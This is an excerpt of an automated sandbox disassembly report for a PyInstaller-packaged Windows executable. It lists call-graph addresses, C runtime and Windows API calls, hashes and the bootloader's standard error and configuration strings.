7ff7f3dede97 16819->16820 16821 7ff7f3dede9b 16820->16821 16822 7ff7f3dedef0 45 API calls 16820->16822 16821->16781 16822->16821 16824 7ff7f3dedad4 16823->16824 16825 
7ff7f3dedaa1 16823->16825 16827 7ff7f3dedaec 16824->16827 16829 7ff7f3dedb6d 16824->16829 16826 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 16825->16826 16831 7ff7f3dedacd __scrt_get_show_window_mode 16826->16831 16828 7ff7f3deddf4 46 API calls 16827->16828 16828->16831 16830 7ff7f3de47c0 45 API calls 16829->16830 16829->16831 16830->16831 16831->16781 16833 7ff7f3dea778 _invalid_parameter_noinfo 37 API calls 16832->16833 16834 7ff7f3dea8f9 16833->16834 16834->16796 16836 7ff7f3df40ff fegetenv 16835->16836 16837 7ff7f3df7e2c 37 API calls 16836->16837 16840 7ff7f3df4152 16837->16840 16838 7ff7f3df4242 16841 7ff7f3df7e2c 37 API calls 16838->16841 16839 7ff7f3df417f 16843 7ff7f3dea4a4 __std_exception_copy 37 API calls 16839->16843 16840->16838 16844 7ff7f3df421c 16840->16844 16845 7ff7f3df416d 16840->16845 16842 7ff7f3df426c 16841->16842 16846 7ff7f3df7e2c 37 API calls 16842->16846 16847 7ff7f3df41fd 16843->16847 16848 7ff7f3dea4a4 __std_exception_copy 37 API calls 16844->16848 16845->16838 16845->16839 16849 7ff7f3df427d 16846->16849 16850 7ff7f3df5324 16847->16850 16855 7ff7f3df4205 16847->16855 16848->16847 16852 7ff7f3df8020 20 API calls 16849->16852 16851 7ff7f3dea900 _isindst 17 API calls 16850->16851 16853 7ff7f3df5339 16851->16853 16863 7ff7f3df42e6 __scrt_get_show_window_mode 16852->16863 16854 7ff7f3ddc550 _log10_special 8 API calls 16856 7ff7f3dee351 16854->16856 16855->16854 16880 7ff7f3df3af4 16856->16880 16857 7ff7f3df468f __scrt_get_show_window_mode 16858 7ff7f3df49cf 16860 7ff7f3df3c10 37 API calls 16858->16860 16859 7ff7f3df4327 memcpy_s 16873 7ff7f3df4c6b memcpy_s __scrt_get_show_window_mode 16859->16873 16875 7ff7f3df4783 memcpy_s __scrt_get_show_window_mode 16859->16875 16861 7ff7f3df50e7 16860->16861 16869 7ff7f3df533c memcpy_s 37 API calls 16861->16869 16878 7ff7f3df5142 16861->16878 16862 7ff7f3df497b 16862->16858 16862->16862 16864 7ff7f3df533c memcpy_s 37 API calls 16862->16864 16863->16857 16863->16859 16865 7ff7f3de4f08 _get_daylight 
11 API calls 16863->16865 16864->16858 16867 7ff7f3df4760 16865->16867 16866 7ff7f3df52c8 16871 7ff7f3df7e2c 37 API calls 16866->16871 16868 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 16867->16868 16868->16859 16869->16878 16870 7ff7f3de4f08 11 API calls _get_daylight 16870->16873 16871->16855 16872 7ff7f3de4f08 11 API calls _get_daylight 16872->16875 16873->16858 16873->16862 16873->16870 16879 7ff7f3dea8e0 37 API calls _invalid_parameter_noinfo 16873->16879 16874 7ff7f3df3c10 37 API calls 16874->16878 16875->16862 16875->16872 16876 7ff7f3dea8e0 37 API calls _invalid_parameter_noinfo 16875->16876 16876->16875 16877 7ff7f3df533c memcpy_s 37 API calls 16877->16878 16878->16866 16878->16874 16878->16877 16879->16873 16881 7ff7f3df3b13 16880->16881 16882 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 16881->16882 16883 7ff7f3df3b3e memcpy_s 16881->16883 16882->16883 16883->16803 16885 7ff7f3dee1d8 memcpy_s 16884->16885 16886 7ff7f3de47c0 45 API calls 16885->16886 16887 7ff7f3dee292 memcpy_s __scrt_get_show_window_mode 16885->16887 16886->16887 16887->16808 16889 7ff7f3dedf2b 16888->16889 16893 7ff7f3dedf78 memcpy_s 16888->16893 16890 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 16889->16890 16891 7ff7f3dedf57 16890->16891 16891->16808 16892 7ff7f3dedfe3 16894 7ff7f3dea4a4 __std_exception_copy 37 API calls 16892->16894 16893->16892 16895 7ff7f3de47c0 45 API calls 16893->16895 16898 7ff7f3dee025 memcpy_s 16894->16898 16895->16892 16896 7ff7f3dea900 _isindst 17 API calls 16897 7ff7f3dee0d0 16896->16897 16898->16896 16900 7ff7f3de0c5f 16899->16900 16906 7ff7f3de0c4e 16899->16906 16901 7ff7f3ded5fc _fread_nolock 12 API calls 16900->16901 16900->16906 16902 7ff7f3de0c90 16901->16902 16903 7ff7f3de0ca4 16902->16903 16904 7ff7f3dea948 __free_lconv_num 11 API calls 16902->16904 16905 7ff7f3dea948 __free_lconv_num 11 API calls 16903->16905 16904->16903 16905->16906 16906->16723 16908 7ff7f3de4766 16907->16908 16909 7ff7f3de476e 16907->16909 16910 
7ff7f3de47c0 45 API calls 16908->16910 16909->16734 16910->16909 16912 7ff7f3ded9d1 16911->16912 16913 7ff7f3de47ff 16911->16913 16912->16913 16919 7ff7f3df3304 16912->16919 16915 7ff7f3deda24 16913->16915 16916 7ff7f3de480f 16915->16916 16917 7ff7f3deda3d 16915->16917 16916->16655 16917->16916 16954 7ff7f3df2650 16917->16954 16931 7ff7f3deb150 GetLastError 16919->16931 16922 7ff7f3df335e 16922->16913 16932 7ff7f3deb174 FlsGetValue 16931->16932 16933 7ff7f3deb191 FlsSetValue 16931->16933 16934 7ff7f3deb18b 16932->16934 16950 7ff7f3deb181 16932->16950 16935 7ff7f3deb1a3 16933->16935 16933->16950 16934->16933 16937 7ff7f3deeb98 _get_daylight 11 API calls 16935->16937 16936 7ff7f3deb1fd SetLastError 16938 7ff7f3deb21d 16936->16938 16939 7ff7f3deb20a 16936->16939 16940 7ff7f3deb1b2 16937->16940 16941 7ff7f3dea504 __FrameHandler3::FrameUnwindToEmptyState 38 API calls 16938->16941 16939->16922 16953 7ff7f3df02d8 EnterCriticalSection 16939->16953 16942 7ff7f3deb1d0 FlsSetValue 16940->16942 16943 7ff7f3deb1c0 FlsSetValue 16940->16943 16947 7ff7f3deb222 16941->16947 16945 7ff7f3deb1ee 16942->16945 16946 7ff7f3deb1dc FlsSetValue 16942->16946 16944 7ff7f3deb1c9 16943->16944 16948 7ff7f3dea948 __free_lconv_num 11 API calls 16944->16948 16949 7ff7f3deaef4 _get_daylight 11 API calls 16945->16949 16946->16944 16948->16950 16951 7ff7f3deb1f6 16949->16951 16950->16936 16952 7ff7f3dea948 __free_lconv_num 11 API calls 16951->16952 16952->16936 16955 7ff7f3deb150 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16954->16955 16956 7ff7f3df2659 16955->16956 16963 7ff7f3df6d88 16957->16963 16962 7ff7f3def8a9 MultiByteToWideChar 16960->16962 16966 7ff7f3df6dec 16963->16966 16964 7ff7f3ddc550 _log10_special 8 API calls 16965 7ff7f3df00bd 16964->16965 16965->16749 16966->16964 16968 7ff7f3de100f 16967->16968 16969 7ff7f3de0ffd 16967->16969 16972 7ff7f3de101d 16968->16972 16976 7ff7f3de1059 16968->16976 16970 7ff7f3de4f08 _get_daylight 11 API calls 16969->16970 16971 7ff7f3de1002 
16970->16971 16974 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 16971->16974 16973 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 16972->16973 16981 7ff7f3de100d 16973->16981 16974->16981 16975 7ff7f3de13d5 16977 7ff7f3de4f08 _get_daylight 11 API calls 16975->16977 16975->16981 16976->16975 16978 7ff7f3de4f08 _get_daylight 11 API calls 16976->16978 16979 7ff7f3de1669 16977->16979 16980 7ff7f3de13ca 16978->16980 16982 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 16979->16982 16983 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 16980->16983 16981->16621 16982->16981 16983->16975 16985 7ff7f3de0704 16984->16985 17012 7ff7f3de0464 16985->17012 16987 7ff7f3de071d 16987->16217 17024 7ff7f3de03bc 16988->17024 16992 7ff7f3ddc850 16991->16992 16993 7ff7f3dd2930 GetCurrentProcessId 16992->16993 16994 7ff7f3dd1c80 49 API calls 16993->16994 16995 7ff7f3dd2979 16994->16995 17038 7ff7f3de4984 16995->17038 17000 7ff7f3dd1c80 49 API calls 17001 7ff7f3dd29ff 17000->17001 17068 7ff7f3dd2620 17001->17068 17004 7ff7f3ddc550 _log10_special 8 API calls 17005 7ff7f3dd2a31 17004->17005 17005->16256 17007 7ff7f3de0119 17006->17007 17009 7ff7f3dd1b89 17006->17009 17008 7ff7f3de4f08 _get_daylight 11 API calls 17007->17008 17010 7ff7f3de011e 17008->17010 17009->16255 17009->16256 17011 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 17010->17011 17011->17009 17013 7ff7f3de04ce 17012->17013 17014 7ff7f3de048e 17012->17014 17013->17014 17016 7ff7f3de04da 17013->17016 17015 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 17014->17015 17017 7ff7f3de04b5 17015->17017 17023 7ff7f3de546c EnterCriticalSection 17016->17023 17017->16987 17025 7ff7f3dd1a20 17024->17025 17026 7ff7f3de03e6 17024->17026 17025->16225 17025->16226 17026->17025 17027 7ff7f3de03f5 __scrt_get_show_window_mode 17026->17027 17028 7ff7f3de0432 17026->17028 17030 7ff7f3de4f08 _get_daylight 11 API calls 17027->17030 17037 7ff7f3de546c EnterCriticalSection 17028->17037 17032 7ff7f3de040a 17030->17032 
17034 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 17032->17034 17034->17025 17042 7ff7f3de49de 17038->17042 17039 7ff7f3de4a03 17040 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 17039->17040 17044 7ff7f3de4a2d 17040->17044 17041 7ff7f3de4a3f 17077 7ff7f3de2c10 17041->17077 17042->17039 17042->17041 17046 7ff7f3ddc550 _log10_special 8 API calls 17044->17046 17045 7ff7f3dea948 __free_lconv_num 11 API calls 17045->17044 17047 7ff7f3dd29c3 17046->17047 17056 7ff7f3de5160 17047->17056 17049 7ff7f3de4b1c 17049->17045 17050 7ff7f3de4ae8 17050->17049 17052 7ff7f3de4af1 17050->17052 17051 7ff7f3de4b40 17051->17049 17054 7ff7f3de4b4a 17051->17054 17053 7ff7f3dea948 __free_lconv_num 11 API calls 17052->17053 17053->17044 17055 7ff7f3dea948 __free_lconv_num 11 API calls 17054->17055 17055->17044 17057 7ff7f3deb2c8 _get_daylight 11 API calls 17056->17057 17058 7ff7f3de5177 17057->17058 17059 7ff7f3dd29e5 17058->17059 17060 7ff7f3deeb98 _get_daylight 11 API calls 17058->17060 17063 7ff7f3de51b7 17058->17063 17059->17000 17061 7ff7f3de51ac 17060->17061 17062 7ff7f3dea948 __free_lconv_num 11 API calls 17061->17062 17062->17063 17063->17059 17215 7ff7f3deec20 17063->17215 17066 7ff7f3dea900 _isindst 17 API calls 17067 7ff7f3de51fc 17066->17067 17069 7ff7f3dd262f 17068->17069 17070 7ff7f3dd9390 2 API calls 17069->17070 17071 7ff7f3dd2660 17070->17071 17072 7ff7f3dd2683 MessageBoxA 17071->17072 17073 7ff7f3dd266f MessageBoxW 17071->17073 17074 7ff7f3dd2690 17072->17074 17073->17074 17075 7ff7f3ddc550 _log10_special 8 API calls 17074->17075 17076 7ff7f3dd26a0 17075->17076 17076->17004 17078 7ff7f3de2c4e 17077->17078 17079 7ff7f3de2c3e 17077->17079 17080 7ff7f3de2c57 17078->17080 17087 7ff7f3de2c85 17078->17087 17083 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 17079->17083 17081 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 17080->17081 17082 7ff7f3de2c7d 17081->17082 17082->17049 17082->17050 17082->17051 17082->17052 17083->17082 17084 7ff7f3de47c0 45 API 
calls 17084->17087 17086 7ff7f3de2f34 17089 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 17086->17089 17087->17079 17087->17082 17087->17084 17087->17086 17091 7ff7f3de35a0 17087->17091 17117 7ff7f3de3268 17087->17117 17147 7ff7f3de2af0 17087->17147 17089->17079 17092 7ff7f3de3655 17091->17092 17093 7ff7f3de35e2 17091->17093 17096 7ff7f3de36af 17092->17096 17097 7ff7f3de365a 17092->17097 17094 7ff7f3de367f 17093->17094 17095 7ff7f3de35e8 17093->17095 17164 7ff7f3de1b50 17094->17164 17102 7ff7f3de35ed 17095->17102 17106 7ff7f3de36be 17095->17106 17096->17094 17096->17106 17115 7ff7f3de3618 17096->17115 17098 7ff7f3de368f 17097->17098 17099 7ff7f3de365c 17097->17099 17171 7ff7f3de1740 17098->17171 17101 7ff7f3de35fd 17099->17101 17105 7ff7f3de366b 17099->17105 17116 7ff7f3de36ed 17101->17116 17150 7ff7f3de3f04 17101->17150 17102->17101 17107 7ff7f3de3630 17102->17107 17102->17115 17105->17094 17109 7ff7f3de3670 17105->17109 17106->17116 17178 7ff7f3de1f60 17106->17178 17107->17116 17160 7ff7f3de43c0 17107->17160 17112 7ff7f3de4558 37 API calls 17109->17112 17109->17116 17111 7ff7f3ddc550 _log10_special 8 API calls 17113 7ff7f3de3983 17111->17113 17112->17115 17113->17087 17115->17116 17185 7ff7f3dee858 17115->17185 17116->17111 17118 7ff7f3de3273 17117->17118 17119 7ff7f3de3289 17117->17119 17120 7ff7f3de3655 17118->17120 17121 7ff7f3de35e2 17118->17121 17125 7ff7f3de32c7 17118->17125 17122 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 17119->17122 17119->17125 17126 7ff7f3de36af 17120->17126 17127 7ff7f3de365a 17120->17127 17123 7ff7f3de367f 17121->17123 17124 7ff7f3de35e8 17121->17124 17122->17125 17130 7ff7f3de1b50 38 API calls 17123->17130 17128 7ff7f3de35ed 17124->17128 17133 7ff7f3de36be 17124->17133 17125->17087 17126->17123 17126->17133 17145 7ff7f3de3618 17126->17145 17129 7ff7f3de368f 17127->17129 17134 7ff7f3de365c 17127->17134 17136 7ff7f3de35fd 17128->17136 17137 7ff7f3de3630 17128->17137 17128->17145 17131 7ff7f3de1740 38 API calls 
17129->17131 17130->17145 17131->17145 17132 7ff7f3de3f04 47 API calls 17132->17145 17138 7ff7f3de1f60 38 API calls 17133->17138 17146 7ff7f3de36ed 17133->17146 17135 7ff7f3de366b 17134->17135 17134->17136 17135->17123 17139 7ff7f3de3670 17135->17139 17136->17132 17136->17146 17140 7ff7f3de43c0 47 API calls 17137->17140 17137->17146 17138->17145 17142 7ff7f3de4558 37 API calls 17139->17142 17139->17146 17140->17145 17141 7ff7f3ddc550 _log10_special 8 API calls 17143 7ff7f3de3983 17141->17143 17142->17145 17143->17087 17144 7ff7f3dee858 47 API calls 17144->17145 17145->17144 17145->17146 17146->17141 17198 7ff7f3de0d14 17147->17198 17151 7ff7f3de3f26 17150->17151 17152 7ff7f3de0b80 12 API calls 17151->17152 17153 7ff7f3de3f6e 17152->17153 17154 7ff7f3dee570 46 API calls 17153->17154 17156 7ff7f3de4041 17154->17156 17155 7ff7f3de4063 17157 7ff7f3de40ec 17155->17157 17159 7ff7f3de47c0 45 API calls 17155->17159 17156->17155 17158 7ff7f3de47c0 45 API calls 17156->17158 17157->17115 17158->17155 17159->17157 17161 7ff7f3de4440 17160->17161 17162 7ff7f3de43d8 17160->17162 17161->17115 17162->17161 17163 7ff7f3dee858 47 API calls 17162->17163 17163->17161 17166 7ff7f3de1b83 17164->17166 17165 7ff7f3de1bb2 17167 7ff7f3de0b80 12 API calls 17165->17167 17170 7ff7f3de1bef 17165->17170 17166->17165 17168 7ff7f3de1c6f 17166->17168 17167->17170 17169 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 17168->17169 17169->17170 17170->17115 17172 7ff7f3de1773 17171->17172 17173 7ff7f3de17a2 17172->17173 17175 7ff7f3de185f 17172->17175 17174 7ff7f3de0b80 12 API calls 17173->17174 17177 7ff7f3de17df 17173->17177 17174->17177 17176 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 17175->17176 17176->17177 17177->17115 17179 7ff7f3de1f93 17178->17179 17180 7ff7f3de1fc2 17179->17180 17182 7ff7f3de207f 17179->17182 17181 7ff7f3de0b80 12 API calls 17180->17181 17184 7ff7f3de1fff 17180->17184 17181->17184 17183 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 17182->17183 
17183->17184 17184->17115 17186 7ff7f3dee880 17185->17186 17187 7ff7f3dee8c5 17186->17187 17188 7ff7f3de47c0 45 API calls 17186->17188 17191 7ff7f3dee885 __scrt_get_show_window_mode 17186->17191 17194 7ff7f3dee8ae __scrt_get_show_window_mode 17186->17194 17187->17191 17187->17194 17195 7ff7f3df07e8 17187->17195 17188->17187 17189 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 17189->17191 17191->17115 17194->17189 17194->17191 17197 7ff7f3df080c WideCharToMultiByte 17195->17197 17199 7ff7f3de0d53 17198->17199 17200 7ff7f3de0d41 17198->17200 17203 7ff7f3de0d60 17199->17203 17206 7ff7f3de0d9d 17199->17206 17201 7ff7f3de4f08 _get_daylight 11 API calls 17200->17201 17202 7ff7f3de0d46 17201->17202 17204 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 17202->17204 17205 7ff7f3dea814 _invalid_parameter_noinfo 37 API calls 17203->17205 17212 7ff7f3de0d51 17204->17212 17205->17212 17207 7ff7f3de0e46 17206->17207 17208 7ff7f3de4f08 _get_daylight 11 API calls 17206->17208 17209 7ff7f3de4f08 _get_daylight 11 API calls 17207->17209 17207->17212 17210 7ff7f3de0e3b 17208->17210 17211 7ff7f3de0ef0 17209->17211 17213 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 17210->17213 17214 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 17211->17214 17212->17087 17213->17207 17214->17212 17216 7ff7f3deec3d 17215->17216 17218 7ff7f3de51dd 17216->17218 17220 7ff7f3deec42 17216->17220 17222 7ff7f3deec8c 17216->17222 17217 7ff7f3de4f08 _get_daylight 11 API calls 17219 7ff7f3deec4c 17217->17219 17218->17059 17218->17066 17221 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 17219->17221 17220->17217 17220->17218 17221->17218 17222->17218 17223 7ff7f3de4f08 _get_daylight 11 API calls 17222->17223 17223->17219 17225 7ff7f3dd8633 __std_exception_copy 17224->17225 17226 7ff7f3dd85b1 GetTokenInformation 17224->17226 17229 7ff7f3dd8646 CloseHandle 17225->17229 17230 7ff7f3dd864c 17225->17230 17227 7ff7f3dd85d2 GetLastError 17226->17227 17228 7ff7f3dd85dd 17226->17228 17227->17225 
7ff7f3de59ec 18774->18776 18775 7ff7f3de571d 18784 7ff7f3de5b00 18775->18784 18776->18775 18798 7ff7f3def724 18776->18798 18778 7ff7f3de5a80 18778->18775 18779 7ff7f3def724 51 API calls 18778->18779 18780 7ff7f3de5a93 18779->18780 18780->18775 18781 7ff7f3def724 51 API calls 18780->18781 18782 7ff7f3de5aa6 18781->18782 18782->18775 18783 7ff7f3def724 51 API calls 18782->18783 18783->18775 18785 7ff7f3de5b1a 18784->18785 18786 7ff7f3de5b51 18785->18786 18787 7ff7f3de5b2a 18785->18787 18789 7ff7f3def5b8 21 API calls 18786->18789 18788 7ff7f3de5b3a 18787->18788 18790 7ff7f3de4e7c _fread_nolock 11 API calls 18787->18790 18788->18726 18789->18788 18790->18788 18792 7ff7f3de5940 18791->18792 18793 7ff7f3de594d FileTimeToSystemTime 18791->18793 18792->18793 18795 7ff7f3de5948 18792->18795 18794 7ff7f3de5961 SystemTimeToTzSpecificLocalTime 18793->18794 18793->18795 18794->18795 18796 7ff7f3ddc550 _log10_special 8 API calls 18795->18796 18797 7ff7f3de5839 18796->18797 18797->18747 18799 7ff7f3def731 18798->18799 18800 7ff7f3def755 18798->18800 18799->18800 18801 7ff7f3def736 18799->18801 18803 7ff7f3def78f 18800->18803 18804 7ff7f3def7ae 18800->18804 18802 7ff7f3de4f08 _get_daylight 11 API calls 18801->18802 18805 7ff7f3def73b 18802->18805 18806 7ff7f3de4f08 _get_daylight 11 API calls 18803->18806 18807 7ff7f3de4f4c 45 API calls 18804->18807 18808 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 18805->18808 18809 7ff7f3def794 18806->18809 18814 7ff7f3def7bb 18807->18814 18810 7ff7f3def746 18808->18810 18811 7ff7f3dea8e0 _invalid_parameter_noinfo 37 API calls 18809->18811 18810->18778 18812 7ff7f3def79f 18811->18812 18812->18778 18813 7ff7f3df04dc 51 API calls 18813->18814 18814->18812 18814->18813

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                      • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                      • API String ID: 3832162212-3165540532
                                                                                      • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                      • Instruction ID: a8d80dfe3c9e3fe2b945a64a1ebc6c5d45b083e293a6540627b65f3584598d47
                                                                                      • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                      • Instruction Fuzzy Hash: 0CD18732A09A8286E790AFB4E8942A9B764FF44758F800235DE7D6B7D8DF3CD145C790

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileLastModuleName
                                                                                      • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
                                                                                      • API String ID: 2776309574-4232158417
                                                                                      • Opcode ID: 76a9bc6180b8f33f3d940ce63715ec287eef657ce8d77edeb0dbadd26b6237bc
                                                                                      • Instruction ID: 4fb2ea448d07d9a1701d28de9040923eedc43dd41333b3bd64cbd30ff9cca828
                                                                                      • Opcode Fuzzy Hash: 76a9bc6180b8f33f3d940ce63715ec287eef657ce8d77edeb0dbadd26b6237bc
                                                                                      • Instruction Fuzzy Hash: 7C32AE21A0C68291FB99B7B4D4543B9F761AF44780FC44132DA7E6B2D6DF2CE568C3A0

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                      • String ID:
                                                                                      • API String ID: 1617910340-0
                                                                                      • Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                      • Instruction ID: 6869748603e4a58de962c456635117745c60ba011b704a3eb74383bd1e551039
                                                                                      • Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
                                                                                      • Instruction Fuzzy Hash: 46C1B132B28A4285EB50EFB5C4912AC7765FB49B98B814235DE3E6B7D8CF38D055C390
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFileFirst
                                                                                      • String ID:
                                                                                      • API String ID: 2295610775-0
                                                                                      • Opcode ID: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                      • Instruction ID: a7ca895c0948d9ab81e47e3977dfa6b0a6a0bd7d763ff6a410496da1bd87aec7
                                                                                      • Opcode Fuzzy Hash: 3849ca1beccae91a12aeced599bc73bdbec409d6dd090ca7d2ec6d5d284a4285
                                                                                      • Instruction Fuzzy Hash: 22F0C862A1974186F7E0AFE0B489766B350EB84368F840335DA7E1A6D4DF3CD149CB40
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentFeaturePresentProcessProcessor
                                                                                      • String ID:
                                                                                      • API String ID: 1010374628-0
                                                                                      • Opcode ID: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                      • Instruction ID: 97ea09916fda8839f94e22c4833aea3a42d5199110d7210012a895fc9922149f
                                                                                      • Opcode Fuzzy Hash: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                      • Instruction Fuzzy Hash: 8102D221A1D64340FBD9BBA59880279EA90AF41BA0FC54634DD7E6F3D9DE3DE44183A0

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 00007FF7F3DD7F90: _fread_nolock.LIBCMT ref: 00007FF7F3DD803A
